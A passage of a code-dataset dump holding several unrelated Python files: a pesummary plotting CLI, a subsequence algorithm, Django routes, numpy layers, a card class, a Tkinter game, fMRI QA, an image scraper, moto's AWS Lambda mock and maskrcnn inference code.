'.css')])\n","sub_path":"src/face_full/utils/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"119767060","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/pesummary/cli/summarydetchar.py\n# Compiled at: 2020-04-21 06:57:35\n# Size of source mod 2**32: 4814 bytes\nimport os, pesummary\nfrom pesummary.gw.file.read import read\nfrom pesummary.gw.plots import detchar\nfrom pesummary.utils.exceptions import InputError\nfrom pesummary.utils.utils import make_dir, logger\nfrom pesummary.core.command_line import DictionaryAction\nimport matplotlib.pyplot as plt, argparse\n__doc__ = 'This executable is used to generate plots associated with the\\ndetectors'\n\ndef command_line():\n \"\"\"Generate an Argument Parser object to control the command line options\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-w', '--webdir', dest='webdir', help='make page and plots in DIR',\n metavar='DIR',\n default=None)\n parser.add_argument('-s', '--samples', dest='samples', help='Posterior samples hdf5 file',\n nargs='+',\n default=None)\n parser.add_argument('--gwdata', dest='gwdata', help='channels and paths to strain cache files',\n action=DictionaryAction,\n metavar='CHANNEL:CACHEFILE',\n nargs='+',\n default=None)\n parser.add_argument('--plot', dest='plot', help='name of the publication plot you wish to produce',\n default='2d_contour',\n choices=[\n 'spectrogram', 'omegascan'])\n parser.add_argument('--gps', dest='gps', default=None, help='GPS time to centre the omegascan around')\n parser.add_argument('--vmin', dest='vmin', default=0, help='minimum for the omegascan colormap')\n parser.add_argument('--vmax', dest='vmax', default=0, help='maximum for the omegascan colormap')\n parser.add_argument('--window', dest='window', default=4, help='window around gps time to generate omegascan for')\n return parser\n\n\ndef get_maxL_time(samples):\n \"\"\"Return the maxL time stored in the samples\n\n Parameters\n ----------\n samples: str\n path to a samples file\n \"\"\"\n f = read(samples)\n samples_dict = f.samples_dict\n return samples_dict['geocent_time'].maxL\n\n\ndef read_strain(dictionary):\n \"\"\"Read the gwdata strain and return a gwpy.timeseries.TimeSeries object\n\n Parameters\n ----------\n dictionary: dict\n dictionary of channels and cache files\n \"\"\"\n from pesummary.gw.file.formats.base_read import GWRead\n for i in dictionary.keys():\n if not os.path.isfile(dictionary[i]):\n raise InputError('The file {} does not exist. Please check the path to your strain file'.format(dictionary[i]))\n\n timeseries = GWRead.load_strain_data(dictionary)\n return timeseries\n\n\ndef make_spectrogram_plot(opts):\n \"\"\"Make a spectrogram plot\n \"\"\"\n gwdata = read_strain(opts.gwdata)\n figs = detchar.spectrogram(gwdata)\n for det, fig in figs.items():\n fig.savefig(os.path.join(opts.webdir, 'spectrogram_{}.png'.format(det)))\n plt.close()\n\n\ndef make_omegascan_plot(opts):\n \"\"\"Make an omegascan plot. If gps is None, centre around maxL from samples\n \"\"\"\n if opts.gps is None:\n opts.gps = get_maxL_time(opts.samples[0])\n gwdata = read_strain(opts.gwdata)\n figs = detchar.omegascan(gwdata,\n (float(opts.gps)), window=(float(opts.window)), vmin=(float(opts.vmin)),\n vmax=(float(opts.vmax)))\n for det, fig in figs.items():\n fig.savefig(os.path.join(opts.webdir, 'omegascan_{}.png'.format(det)))\n plt.close()\n\n\ndef main(args=None):\n \"\"\"Top level interface for `summarydetchar`\n \"\"\"\n parser = command_line()\n opts = parser.parse_args(args=args)\n make_dir(opts.webdir)\n func_map = {'spectrogram':make_spectrogram_plot, 'omegascan':make_omegascan_plot}\n func_map[opts.plot](opts)","sub_path":"pycfiles/pesummary-0.5.4-py3.6/summarydetchar.cpython-36.py","file_name":"summarydetchar.cpython-36.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"609204900","text":"def longest_subseq():\r\n # Прочитаем исходные данные из консоли\r\n n = int(input())\r\n x = [int(i) for i in input().split(' ')]\r\n P = [0]*n\r\n M = [0]*(n + 1)\r\n L = 0\r\n x = x[::-1]\r\n for i in range(n):\r\n lo = 1\r\n hi = L\r\n while lo <= hi:\r\n mid = (lo + hi) // 2\r\n if x[M[mid]] < x[i]:\r\n lo = mid + 1\r\n elif x[M[mid]] == x[i]:\r\n lo += 1\r\n else:\r\n hi = mid - 1\r\n newL = lo\r\n P[i] = M[newL - 1]\r\n if newL > L:\r\n M[newL] = i\r\n L = newL\r\n elif x[i] < x[M[newL]]:\r\n M[newL] = i\r\n \r\n # Восстановим решение по рассчитанным данным\r\n re = [0]*L\r\n k = M[L]\r\n for i in range(L-1, -1, -1):\r\n re[i] = n - k\r\n k = P[k]\r\n print(len(re))\r\n print(' '.join(map(str,re[::-1])))\r\n\r\nif __name__ == \"__main__\":\r\n longest_subseq()\r\n","sub_path":"8.2.2.py","file_name":"8.2.2.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"311476398","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nfrom .views import (\n account_view,\n signup_view,\n login_view,\n logout_view\n)\n\napp_name = 'accounts'\n\n\nurlpatterns = [\n path('account/', account_view),\n path('signup/', signup_view, name=\"signup\"),\n path('login/', login_view, name=\"login\"),\n path('logout/', logout_view, name=\"logout\"),\n\n\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"382520755","text":"\"Library of Layers\"\n\nimport copy\nfrom common.np import * # import numpy as np\n\nclass Sigmoid:\n \"Sigmoid Layer. y = 1 / (1 + exp(-x))\"\n def __init__(self):\n self.params, self.grads = {}, {}\n self.out = None # 順伝播の出力\n def forward(self, x):\n self.out = 1.0 / (1.0 + np.exp(-x))\n return self.out\n def backward(self, dout):\n dx = dout * self.out * (1 - self.out) # dy/dx = y(1-y). xへの逆伝播は dL/dy*dy/dx. ここでdL/dyがdout.\n return dx\n\n\nclass Affine:\n \"\"\"\n 全結合層 y = xW + b\n W : Weight (Rows: the number of input nodes, Cols: the number of output nodes)\n x : input data (Rows: the number of data, Cols: the number of input nodes)\n b : bias (Rows: 1, Cols: the number of output nodes)\n y : output (Rows: the number of data, Cols: the number of output nodes)\n \"\"\"\n def __init__(self, W, b):\n self.params = {\"W\": W, \"b\": b}\n self.grads = {\"W\": np.zeros_like(W), \"b\": np.zeros_like(b)}\n self.x = None\n def forward(self, x):\n \"y = x.W + b\"\n self.x = x\n return np.dot(x, self.params[\"W\"]) + self.params[\"b\"]\n def backward(self, dout):\n \"\"\"\n Paremeters\n --------\n dout : ndarray\n dL/dy matrix (Rows: the number of data, Cols: the number of output nodes)\n --------\n \"\"\"\n dx = np.dot(dout, self.params[\"W\"].T) # dL/dy . W^T\n dW = np.dot(self.x.T, dout) # (dL/dy)^T . x\n db = np.sum(dout, axis=0) # dL/dyの全行を足し合わせて1行に\n self.grads[\"W\"] = dW.copy()\n self.grads[\"b\"] = db.copy()\n return dx\n\nclass SoftmaxWithLoss:\n def __init__(self):\n self.params, self.grads = {}, {}\n self.t = None # Teacher Data\n self.y = None # Output Data\n def forward(self, x, t):\n self.y = softmax(x)\n self.t = t\n # 教師ラベルがone-hotベクトルの場合、正解のインデックスに変換\n if self.t.size == self.y.size:\n self.t = self.t.argmax(axis=1) # argmaxは最大値のあるindexを返す\n loss = cross_entropy(self.y, self.t)\n return loss\n def backward(self, dout=1):\n batch_size = self.t.shape[0]\n dx = self.y.copy()\n dx[np.arange(batch_size), self.t] -= 1\n dx *= dout\n dx = dx / batch_size\n return dx\n\ndef softmax(x):\n \"\"\"\n xは1次元のndarrayベクトル * データ数\n Parameters\n --------\n x : ndarray\n matrix (Rows: the number of data, Cols: dimension of x)\n --------\n \"\"\"\n expx = np.exp(x)\n return expx / np.sum(expx, axis=1).reshape(30, 1)\n\ndef cross_entropy(y, t):\n \"交差エントロピー誤差. yは出力値、tは教師データ\"\n #return -np.sum(t * np.log(y))\n loss = 0\n for i, t_idx in enumerate(t):\n loss += -np.log(y[i][t_idx])\n return loss\n","sub_path":"common/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"116497893","text":"\"\"\"\nCreating a representation of cards and evaluating hand strengths\n\"\"\"\nfrom itertools import product as prod\ncardValues = {'J': 11, 'Q': 12, 'K': 13, 'A': 14}\nfor i in range(10):\n cardValues[str(i)] = i\nvalueNames = {'J': 'Jack', 'Q': 'Queen', 'K': 'King', 'A': 'Ace'}\nfullSuits = {'C': 'Clubs', 'H': 'Hearts', 'S': 'Spades', 'D': 'Diamonds'}\n\n\nclass Card:\n def __init__(self, suit, value):\n self.suit = suit\n self.value = value\n if value.isdigit():\n self.num = value\n self.picture = False\n else:\n self.num = cardValues[value]\n self.picture = True\n\n def __str__(self):\n if self.picture:\n return f\"{valueNames[self.value]} of {fullSuits[self.suit]}\"\n else:\n return f\"{self.value} of {fullSuits[self.suit]}\"\n\n def __repr__(self):\n return f\"{self.value} {self.suit}\"\n\n def __le__(self, other):\n return self.value <= other.value\n\n\nprint(list(prod(fullSuits.keys(), cardValues.keys())))\n\n\n\n","sub_path":"Old Code/PokerBot.py","file_name":"PokerBot.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"478244889","text":"# -*- coding: utf-8 -*-\nimport random\nfrom Tkinter import *\nimport tkMessageBox\n\nclass Person:\n def __init__(self, uuid, name):\n self.uuid = uuid\n self.name = name\n \nclass Table:\n def __init__(self, uuid, name, persons):\n self.uuid = uuid\n self.name = name\n self.persons = persons\n \ndef main():\n persons = []\n\n f = open(\"personer.txt\", \"r\")\n for x in f:\n uuid = 1\n uuid += 1\n persons.append(Person(uuid, x.strip()))\n f.close()\n\n tasks = []\n f = open('oppgaver.txt', \"r\")\n for x in f:\n tasks.append(x.strip())\n f.close()\n\n\n tableOne = Table(\"001\", \"table 1\", [persons.pop(), persons.pop(), persons.pop()])\n\n tableTwo = Table(\"002\", \"table 2\", [persons.pop(), persons.pop(), persons.pop()])\n\n \n\n tables = [tableOne, tableTwo]\n\n top = Tk()\n def personCallBack():\n table = random.choice(tables)\n task = random.choice(tasks)\n personObj = random.choice(table.persons)\n person = personObj.name\n var.set(person + \" fra \" + table.name + \" skal \" + task)\n\n def tableCallBack():\n table = random.choice(tables)\n task = random.choice(tasks)\n var.set(\"alle fra \" + table.name + \" skal \" + task)\n \n B = Button(top, text =\"Bord\", command = tableCallBack)\n A = Button(top, text =\"Person\", command = personCallBack)\n var = StringVar()\n label = Label( top, textvariable=var, relief=RAISED )\n var.set(\"Velkommen til TableSelector.py verdens kuleste spill \\n for å spille trengs to filer personer.txt og oppgaver.txt i samme mappe som scriptet\")\n label.pack()\n A.pack()\n B.pack()\n\n top.mainloop()\n\n\n\n# while(text != \"end\"): \n# person = \"alle\"\n# table = random.choice(tables)\n# task = random.choice(tasks)\n# if text == \"person\":\n# personObj = random.choice(table.persons)\n# person = personObj.name\n# print(person + \" fra \" + table.name + \" skal \" + task)\n# text = raw_input(\"Skal oppgaven løses av en person eller et helt bord?\\n\")\n\n \nif __name__ == '__main__':\n main()","sub_path":"TableSelector.py","file_name":"TableSelector.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"294779750","text":"\"\"\"Preprocess QA.\"\"\"\nfrom os.path import join as opj\nfrom glob import glob\nimport os\n\n'''\nSpecify global variables\n'''\n# Specify directory\nbase_dir = '/seastor/zhifang/ds002'\nderiv_dir = opj(base_dir, 'derivatives')\n# Subject list\nsubject_list = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10',\n '11', '12', '13', '14', '15', '16', '17', '18', '19', '20',\n '21', '22']\n# QA file\nout_file = opj(deriv_dir, 'qa', 'lv1_qa.html')\n# Get feat dir\nenc_list = sorted(glob(opj(deriv_dir, 'sub-*', 'func',\n 'preprocess_encoding_run-*_5mm.feat')))\nretr_list = sorted(glob(opj(deriv_dir, 'sub-*', 'func',\n 'preprocess_retrieval_run-*_5mm.feat')))\nloca_list = sorted(glob(opj(deriv_dir, 'sub-*', 'func',\n 'preprocess_localizer_run-*_5mm.feat')))\nfeat_list = enc_list + retr_list + loca_list\n\nf = open(out_file, 'w')\nfor file in list(feat_list):\n f.write(\"

============================================\")\n f.write(\"

%s\" % (file))\n f.write(\"\" % (file))\n f.write(\"\" % (file))\n f.write(\"\" % (file))\n f.write(\"\" % (file))\n f.write(\"\" % (file))\n f.write(\"

\" % (file))\n f.write(\"

\" % (file))\n f.write(\"

\" % (file))\nf.close()\n","sub_path":"code/p02_model06_qa-preprocess.py","file_name":"p02_model06_qa-preprocess.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111719256","text":"\"\"\"multithread spider\"\"\"\nimport queue\nimport threading\nimport time\nimport random\nfrom huiparse import deal_group_page\nfrom huiparse import download_work\n\n\n# max groups to traverse\nMAX_GROUPS_TO_TRAVERSE = 10\n# images to download : [(groupID1,[url1,url2,..])\nDOWNLOAD_QUEUE = queue.Queue()\n# groups to be traverse [(groupID1, url1), (groupID2, url2)...]\nTRAVERSE_QUEUE = queue.Queue()\n# groupID recorder to remember the groups that has been traversed\nGROUP_TRAVERSED = []\n# producer and consumer\nCONDITION = threading.Condition()\n# the start group page\nSTART_PAGE = \"http://www.361games.com/html/tu/486426.html\"\n\n\ndef filter_with_shared_list(condition, share_list, elements):\n \"\"\"\n filter the elements with shared list\n :param share_list : [groupID1, groupID2...]\n :param elements : [(groupID1, url1), (groupID2, url2)...]\n \"\"\"\n if condition.acquire():\n for item in elements:\n if item[0] in share_list:\n elements.remove(item)\n else:\n share_list.append(item[0])\n condition.notify()\n condition.release()\n\n\ndef group_page_process(start_page):\n \"\"\"the main proc tp process a new page\"\"\"\n print(\"CURRENTS: \", start_page)\n recommends, pics = deal_group_page(start_page)\n if len(pics) != 0:\n DOWNLOAD_QUEUE.put(pics)\n if TRAVERSE_QUEUE.qsize() < 3:\n filter_with_shared_list(CONDITION, GROUP_TRAVERSED, recommends)\n if len(recommends) != 0:\n TRAVERSE_QUEUE.put(recommends)\n\n\ndef producer(name):\n \"\"\"thread to parse the web page and generate the wanted contents\"\"\"\n while True:\n if DOWNLOAD_QUEUE.qsize() <= 10:\n next_groups = TRAVERSE_QUEUE.get()\n print('Producer %s:' % name)\n for item in next_groups:\n group_page_process(item[1])\n time.sleep(random.random())\n\n\ndef consumer(name):\n \"\"\"thread to do the downloading works\"\"\"\n while True:\n pics = DOWNLOAD_QUEUE.get()\n print('Consumer %s:' % name)\n download_work(pics)\n\n\n# the main function\nif __name__ == '__main__':\n group_page_process(START_PAGE)\n for i in range(1):\n p = threading.Thread(target=producer, args=('zhanghui',))\n p.start()\n\n for i in range(2):\n c = threading.Thread(target=consumer, args=('wenjing',))\n c.start()\n","sub_path":"ToutiaoPlus/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"583195448","text":"from __future__ import unicode_literals\n\nimport base64\nimport datetime\nimport hashlib\nimport io\nimport os\nimport json\nimport sys\nimport zipfile\n\ntry:\n from StringIO import StringIO\nexcept:\n from io import StringIO\n\nimport boto.awslambda\nfrom moto.core import BaseBackend, BaseModel\nfrom moto.s3.models import s3_backend\nfrom moto.s3.exceptions import MissingBucket, MissingKey\n\n\nclass LambdaFunction(BaseModel):\n\n def __init__(self, spec, validate_s3=True):\n # required\n self.code = spec['Code']\n self.function_name = spec['FunctionName']\n self.handler = spec['Handler']\n self.role = spec['Role']\n self.run_time = spec['Runtime']\n\n # optional\n self.description = spec.get('Description', '')\n self.memory_size = spec.get('MemorySize', 128)\n self.publish = spec.get('Publish', False) # this is ignored currently\n self.timeout = spec.get('Timeout', 3)\n\n # this isn't finished yet. it needs to find out the VpcId value\n self._vpc_config = spec.get(\n 'VpcConfig', {'SubnetIds': [], 'SecurityGroupIds': []})\n\n # auto-generated\n self.version = '$LATEST'\n self.last_modified = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')\n if 'ZipFile' in self.code:\n # more hackery to handle unicode/bytes/str in python3 and python2 -\n # argh!\n try:\n to_unzip_code = base64.b64decode(\n bytes(self.code['ZipFile'], 'utf-8'))\n except Exception:\n to_unzip_code = base64.b64decode(self.code['ZipFile'])\n\n zbuffer = io.BytesIO()\n zbuffer.write(to_unzip_code)\n zip_file = zipfile.ZipFile(zbuffer, 'r', zipfile.ZIP_DEFLATED)\n self.code = zip_file.read(\"\".join(zip_file.namelist()))\n self.code_size = len(to_unzip_code)\n self.code_sha_256 = hashlib.sha256(to_unzip_code).hexdigest()\n else:\n # validate s3 bucket and key\n key = None\n try:\n # FIXME: does not validate bucket region\n key = s3_backend.get_key(\n self.code['S3Bucket'], self.code['S3Key'])\n except MissingBucket:\n if do_validate_s3():\n raise ValueError(\n \"InvalidParameterValueException\",\n \"Error occurred while GetObject. S3 Error Code: NoSuchBucket. S3 Error Message: The specified bucket does not exist\")\n except MissingKey:\n if do_validate_s3():\n raise ValueError(\n \"InvalidParameterValueException\",\n \"Error occurred while GetObject. S3 Error Code: NoSuchKey. S3 Error Message: The specified key does not exist.\")\n if key:\n self.code_size = key.size\n self.code_sha_256 = hashlib.sha256(key.value).hexdigest()\n self.function_arn = 'arn:aws:lambda:123456789012:function:{0}'.format(\n self.function_name)\n\n self.tags = dict()\n\n @property\n def vpc_config(self):\n config = self._vpc_config.copy()\n if config['SecurityGroupIds']:\n config.update({\"VpcId\": \"vpc-123abc\"})\n return config\n\n def __repr__(self):\n return json.dumps(self.get_configuration())\n\n def get_configuration(self):\n return {\n \"CodeSha256\": self.code_sha_256,\n \"CodeSize\": self.code_size,\n \"Description\": self.description,\n \"FunctionArn\": self.function_arn,\n \"FunctionName\": self.function_name,\n \"Handler\": self.handler,\n \"LastModified\": self.last_modified,\n \"MemorySize\": self.memory_size,\n \"Role\": self.role,\n \"Runtime\": self.run_time,\n \"Timeout\": self.timeout,\n \"Version\": self.version,\n \"VpcConfig\": self.vpc_config,\n }\n\n def get_code(self):\n if isinstance(self.code, dict):\n return {\n \"Code\": {\n \"Location\": \"s3://lambda-functions.aws.amazon.com/{0}\".format(self.code['S3Key']),\n \"RepositoryType\": \"S3\"\n },\n \"Configuration\": self.get_configuration(),\n }\n else:\n return {\n \"Configuration\": self.get_configuration(),\n }\n\n def convert(self, s):\n try:\n return str(s, encoding='utf-8')\n except:\n return s\n\n def is_json(self, test_str):\n try:\n response = json.loads(test_str)\n except:\n response = test_str\n return response\n\n def _invoke_lambda(self, code, event={}, context={}):\n # TO DO: context not yet implemented\n try:\n mycode = \"\\n\".join(['import json',\n self.convert(self.code),\n self.convert('print(json.dumps(lambda_handler(%s, %s)))' % (self.is_json(self.convert(event)), context))])\n\n except Exception as ex:\n print(\"Exception %s\", ex)\n\n errored = False\n try:\n original_stdout = sys.stdout\n original_stderr = sys.stderr\n codeOut = StringIO()\n codeErr = StringIO()\n sys.stdout = codeOut\n sys.stderr = codeErr\n exec(mycode)\n exec_err = codeErr.getvalue()\n exec_out = codeOut.getvalue()\n result = self.convert(exec_out.strip())\n if exec_err:\n result = \"\\n\".join([exec_out.strip(), self.convert(exec_err)])\n except Exception as ex:\n errored = True\n result = '%s\\n\\n\\nException %s' % (mycode, ex)\n finally:\n codeErr.close()\n codeOut.close()\n sys.stdout = original_stdout\n sys.stderr = original_stderr\n return self.convert(result), errored\n\n def invoke(self, body, request_headers, response_headers):\n payload = dict()\n\n # Get the invocation type:\n res, errored = self._invoke_lambda(code=self.code, event=body)\n if request_headers.get(\"x-amz-invocation-type\") == \"RequestResponse\":\n encoded = base64.b64encode(res.encode('utf-8'))\n response_headers[\"x-amz-log-result\"] = encoded.decode('utf-8')\n payload['result'] = response_headers[\"x-amz-log-result\"]\n result = res.encode('utf-8')\n else:\n result = json.dumps(payload)\n if errored:\n response_headers['x-amz-function-error'] = \"Handled\"\n\n return result\n\n @classmethod\n def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):\n properties = cloudformation_json['Properties']\n\n # required\n spec = {\n 'Code': properties['Code'],\n 'FunctionName': resource_name,\n 'Handler': properties['Handler'],\n 'Role': properties['Role'],\n 'Runtime': properties['Runtime'],\n }\n optional_properties = 'Description MemorySize Publish Timeout VpcConfig'.split()\n # NOTE: Not doing `properties.get(k, DEFAULT)` to avoid duplicating the\n # default logic\n for prop in optional_properties:\n if prop in properties:\n spec[prop] = properties[prop]\n\n # when ZipFile is present in CloudFormation, per the official docs,\n # the code it's a plaintext code snippet up to 4096 bytes.\n # this snippet converts this plaintext code to a proper base64-encoded ZIP file.\n if 'ZipFile' in properties['Code']:\n spec['Code']['ZipFile'] = base64.b64encode(\n cls._create_zipfile_from_plaintext_code(spec['Code']['ZipFile']))\n\n backend = lambda_backends[region_name]\n fn = backend.create_function(spec)\n return fn\n\n def get_cfn_attribute(self, attribute_name):\n from moto.cloudformation.exceptions import UnformattedGetAttTemplateException\n if attribute_name == 'Arn':\n region = 'us-east-1'\n return 'arn:aws:lambda:{0}:123456789012:function:{1}'.format(region, self.function_name)\n raise UnformattedGetAttTemplateException()\n\n @staticmethod\n def _create_zipfile_from_plaintext_code(code):\n zip_output = io.BytesIO()\n zip_file = zipfile.ZipFile(zip_output, 'w', zipfile.ZIP_DEFLATED)\n zip_file.writestr('lambda_function.zip', code)\n zip_file.close()\n zip_output.seek(0)\n return zip_output.read()\n\n\nclass EventSourceMapping(BaseModel):\n\n def __init__(self, spec):\n # required\n self.function_name = spec['FunctionName']\n self.event_source_arn = spec['EventSourceArn']\n self.starting_position = spec['StartingPosition']\n\n # optional\n self.batch_size = spec.get('BatchSize', 100)\n self.enabled = spec.get('Enabled', True)\n self.starting_position_timestamp = spec.get('StartingPositionTimestamp', None)\n\n @classmethod\n def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):\n properties = cloudformation_json['Properties']\n spec = {\n 'FunctionName': properties['FunctionName'],\n 'EventSourceArn': properties['EventSourceArn'],\n 'StartingPosition': properties['StartingPosition']\n }\n optional_properties = 'BatchSize Enabled StartingPositionTimestamp'.split()\n for prop in optional_properties:\n if prop in properties:\n spec[prop] = properties[prop]\n return EventSourceMapping(spec)\n\n\nclass LambdaVersion(BaseModel):\n\n def __init__(self, spec):\n self.version = spec['Version']\n\n @classmethod\n def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):\n properties = cloudformation_json['Properties']\n spec = {\n 'Version': properties.get('Version')\n }\n return LambdaVersion(spec)\n\n\nclass LambdaBackend(BaseBackend):\n\n def __init__(self):\n self._functions = {}\n\n def has_function(self, function_name):\n return function_name in self._functions\n\n def has_function_arn(self, function_arn):\n return self.get_function_by_arn(function_arn) is not None\n\n def create_function(self, spec):\n fn = LambdaFunction(spec)\n self._functions[fn.function_name] = fn\n return fn\n\n def get_function(self, function_name):\n return self._functions[function_name]\n\n def get_function_by_arn(self, function_arn):\n for function in self._functions.values():\n if function.function_arn == function_arn:\n return function\n return None\n\n def delete_function(self, function_name):\n del self._functions[function_name]\n\n def list_functions(self):\n return self._functions.values()\n\n def list_tags(self, resource):\n return self.get_function_by_arn(resource).tags\n\n def tag_resource(self, resource, tags):\n self.get_function_by_arn(resource).tags.update(tags)\n\n def untag_resource(self, resource, tagKeys):\n function = self.get_function_by_arn(resource)\n for key in tagKeys:\n try:\n del function.tags[key]\n except KeyError:\n pass\n # Don't care\n\n\ndef do_validate_s3():\n return os.environ.get('VALIDATE_LAMBDA_S3', '') in ['', '1', 'true']\n\n\nlambda_backends = {}\nfor region in boto.awslambda.regions():\n lambda_backends[region.name] = LambdaBackend()\n\n# Handle us forgotten regions, unless Lambda truly only runs out of US and\nfor region in ['ap-southeast-2']:\n lambda_backends[region] = LambdaBackend()\n","sub_path":"moto/awslambda/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"446246240","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport logging\nimport time\nimport os\n\nimport torch\nfrom tqdm import tqdm\n\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data.datasets.evaluation import evaluate\nfrom ..utils.comm import is_main_process, get_world_size\nfrom ..utils.comm import all_gather\nfrom ..utils.comm import synchronize\nfrom ..utils.timer import Timer, get_time_str\nfrom .bbox_aug import im_detect_bbox_aug\n# def crop_image\nfrom maskrcnn_benchmark.structures.image_list import to_image_list\nfrom maskrcnn_benchmark.modeling.poolers import Pooler\nimport numpy as np\ndef crop_image(images,boxes):\n image = images.tensors\n bboxes = boxes.bbox.data.cpu().numpy().astype(np.int32)\n \n all_images = []\n for box in bboxes:\n minx,miny,maxx,maxy = box\n all_images.append(torch.nn.functional.interpolate(image[:,:,miny:maxy,minx:maxx], size=(4*32,15*32),mode='bilinear', align_corners=True)) \n return to_image_list(torch.cat(all_images,dim=0))\ndef compute_on_dataset(model_detect, model_retrieval, data_loader, device, timer=None):\n model_detect.eval()\n model_retrieval.eval()\n results_dict = {}\n cpu_device = torch.device(\"cpu\")\n for _, batch in enumerate(tqdm(data_loader)):\n images, targets, image_ids = batch\n \n with torch.no_grad():\n if timer:\n timer.tic()\n # output = model(images.to(device),targets,is_words=(_==0))\n output = model_detect(images.to(device),targets,is_words=True)\n if output[0].bbox.size(0)==0:\n zero_bedding = torch.zeros([0,1920]).type_as(output[0].bbox)\n output[0].add_field(\"imgs_embedding_nor\",zero_bedding)\n # output[0].add_field(\"words_embedding_nor\",retrieval_result[\"words_embedding_nor\"])\n else:\n all_images = crop_image(images,output[0])\n retrieval_result = model_retrieval(all_images.to(device),targets,is_words=True)\n output[0].add_field(\"imgs_embedding_nor\",retrieval_result[\"imgs_embedding_nor\"])\n output[0].add_field(\"words_embedding_nor\",retrieval_result[\"words_embedding_nor\"])\n # print(output,images)\n if _ == 0:\n output[0].add_field(\"y_trues\",targets[0].get_field(\"y_trues\"))\n if timer:\n if not cfg.MODEL.DEVICE == 'cpu':\n torch.cuda.synchronize()\n timer.toc()\n output = [o.to(cpu_device) for o in output]\n results_dict.update(\n {img_id: result for img_id, result in zip(image_ids, output)}\n )\n \n return results_dict\n\n\ndef _accumulate_predictions_from_multiple_gpus(predictions_per_gpu):\n all_predictions = all_gather(predictions_per_gpu)\n if not is_main_process():\n return\n # merge the list of dicts\n predictions = {}\n for p in all_predictions:\n predictions.update(p)\n # convert a dict where the key is the index in a list\n image_ids = list(sorted(predictions.keys()))\n if len(image_ids) != image_ids[-1] + 1:\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n logger.warning(\n \"Number of images that were gathered from multiple processes is not \"\n \"a contiguous set. Some images might be missing from the evaluation\"\n )\n\n # convert to a list\n predictions = [predictions[i] for i in image_ids]\n return predictions\n\n\ndef inference(\n model_detect,\n model_retrieval,\n data_loader,\n dataset_name,\n iou_types=(\"bbox\",),\n rec_type = \"ctc\",\n box_only=False,\n device=\"cuda\",\n expected_results=(),\n expected_results_sigma_tol=4,\n output_folder=None,\n):\n\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n dataset = data_loader.dataset\n logger.info(\"Start evaluation on {} dataset({} images).\".format(dataset_name, len(dataset)))\n\n extra_args = dict(\n box_only=box_only,\n iou_types=iou_types,\n rec_type=rec_type,\n expected_results=expected_results,\n expected_results_sigma_tol=expected_results_sigma_tol,\n )\n\n # load predictions if exists\n prediction_file = os.path.join(output_folder, 'predictions.pth')\n # if os.path.isfile(prediction_file):\n # predictions = torch.load(prediction_file)\n # logger.info(\"Found prediction results at {}\".format(prediction_file))\n\n # return evaluate(dataset=dataset,\n # predictions=predictions,\n # output_folder=output_folder,\n # **extra_args)\n\n # convert to a torch.device for efficiency\n device = torch.device(device)\n num_devices = get_world_size()\n total_timer = Timer()\n inference_timer = Timer()\n total_timer.tic()\n predictions = compute_on_dataset(model_detect, model_retrieval, data_loader, device, inference_timer)\n # wait for all processes to complete before measuring the time\n synchronize()\n total_time = total_timer.toc()\n total_time_str = get_time_str(total_time)\n logger.info(\n \"Total run time: {} ({} s / img per device, on {} devices)\".format(\n total_time_str, total_time * num_devices / len(dataset), num_devices\n )\n )\n total_infer_time = get_time_str(inference_timer.total_time)\n logger.info(\n \"Model inference time: {} ({} s / img per device, on {} devices)\".format(\n total_infer_time,\n inference_timer.total_time * num_devices / len(dataset),\n num_devices,\n )\n )\n\n predictions = _accumulate_predictions_from_multiple_gpus(predictions)\n if not is_main_process():\n return\n\n if output_folder:\n torch.save(predictions, os.path.join(output_folder, \"predictions.pth\"))\n\n return evaluate(dataset=dataset,\n predictions=predictions,\n output_folder=output_folder,\n **extra_args)\n","sub_path":"maskrcnn_benchmark/engine/inference_two_net.py","file_name":"inference_two_net.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"363956131","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 09:18:14 2019\n\n@author: tanvirkaur\n\"\"\"\n\n#time complexity = O(n)\n#Space complexity = 